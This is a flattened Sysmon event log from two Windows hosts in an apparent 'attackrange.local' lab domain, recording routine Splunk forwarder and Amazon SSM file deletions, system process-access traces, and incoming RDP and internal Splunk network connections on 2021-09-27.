23542300x80000000000000001049699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:28.700{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4306MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:28.100{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8927988CF9CA631DB3989A2207EB54A,SHA256=EF2065DB945D70E0B59EDF5DC3306E2CEC0F00059D340C321BAF7472E63105A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978347Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.118{69CF5F33-8A47-6151-B579-00000000FD01}8282284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000978379Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:26.715{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59357-false10.0.1.12-8000- 23542300x8000000000000000978378Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.649{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5563E20012D5E6EF95A9F6652070443,SHA256=AF905511E683A7FAB4D81584F0BCA6788B27E63AAB1ED56A42580393A5D4FB93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978377Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.555{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CC9122EB4E53C67A83FC7261DA1CC31,SHA256=4984D41D70CF3E347DC632CD7D884CD866770D4216991A1BF0DB99B18206183F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978376Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.462{69CF5F33-8A49-6151-B779-00000000FD01}28403324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:29.133{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6EF4685CEA322CFCEAAD950566D855F,SHA256=F5243141CB9AE78292E77E3480A220076358ED50AE8D94E350B05DE784A186B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978375Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A49-6151-B779-00000000FD01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978374Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978373Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978372Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978371Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978370Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978369Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978368Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978367Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978366Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978365Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.305{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8A49-6151-B779-00000000FD01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978364Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.290{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A49-6151-B779-00000000FD01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978363Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:29.291{69CF5F33-8A49-6151-B779-00000000FD01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000978382Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:28.105{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49675-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978381Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:30.837{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A2EF69F065D60C77C5D1624FAD21DA1,SHA256=5AD0DB2DD3672B925D42A2819A4219130FF50E1D9CD92F4A87DB97DBCA257EB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978380Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:30.477{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D188C53A49A3EA70733A4A8EF313A7CF,SHA256=44E9869DCAB4C69C61A0C3349C5EF70887EE23464A16AED04D5F90CC6D4DA08F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:28.364{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60644-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:30.152{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B3580978AF8860C874BCBF0040B8944,SHA256=9CBC4CBB64CB40E3B8A2CDEECA0AA48BC0F743494ADA76571207B1ED7372CC56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:30.035{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59A0DE7D57442DCD4B20A2C429E0F818,SHA256=AC777C1FA962366B117C6CB9D2C3474F905E3BB72824531DF89B6FAF0B9A2436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:30.034{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E322C8A522FDE659330B4A3243015F24,SHA256=098BD417BCB894103A85E0D20499228B45AA60BB3D68C6D5344D3B56F0D1468F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978383Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:31.712{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E11AE3C05A3F86BA17476BE4317A15,SHA256=C1AA2E154DDFBBFA9A0AFC7AF1054F993D5005997707CC707C7185130D9159AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:31.153{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7609D549DD11FB29010797C831C9C11,SHA256=F05F215E524AE870F3DA09FAE8A1B1E192647E8846D66B1BE1C1AD3C254DCF00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978385Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:32.946{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7E4AC7DEFDB8E6D5EE7BAA91DEB0215,SHA256=7C66D4108EEC9997F4E5ADD361B59B2833BC245C8DF100A86EAEEA7D2B40E91E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:32.634{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59A0DE7D57442DCD4B20A2C429E0F818,SHA256=AC777C1FA962366B117C6CB9D2C3474F905E3BB72824531DF89B6FAF0B9A2436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:32.183{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB82C4074AAF9A22569420460576D043,SHA256=5CBCB7F44539434EF5F9C8200E548B4A54A46E31921EF595A541B4BAAA94DFC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978384Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:32.524{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F2FC2CA96495995FBAAADB35EEBDC4CC,SHA256=430192B14BDBC42D82ABC03F454B57CFDB18E0BAD5F9CE5CC5CEF5C9A395CD95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978386Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:33.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30326C3E5BEDECDD7FDBEF8F319213D4,SHA256=0DFD8AABC1C55D634B2F92238C224529DA8059DA093745D1304FAE835C019539,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:31.286{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-51626-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:30.735{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62069-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:33.198{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E55168AE69B2DA3A9B32BECB6D6C76,SHA256=9E4E9E4998C2D19E1FECA230EF05567B33CAD52BE461EC245C6BE89E04BAC029,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:31.743{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53333-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:34.213{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=749BA3142A85E3F14B3E359F49BB004C,SHA256=19DD5156138F9D570F9758DD4D660EA363E1A6E39FC70C9F58979C565F61C460,IMPHASH=00000000000000000000000000000000falsetrue 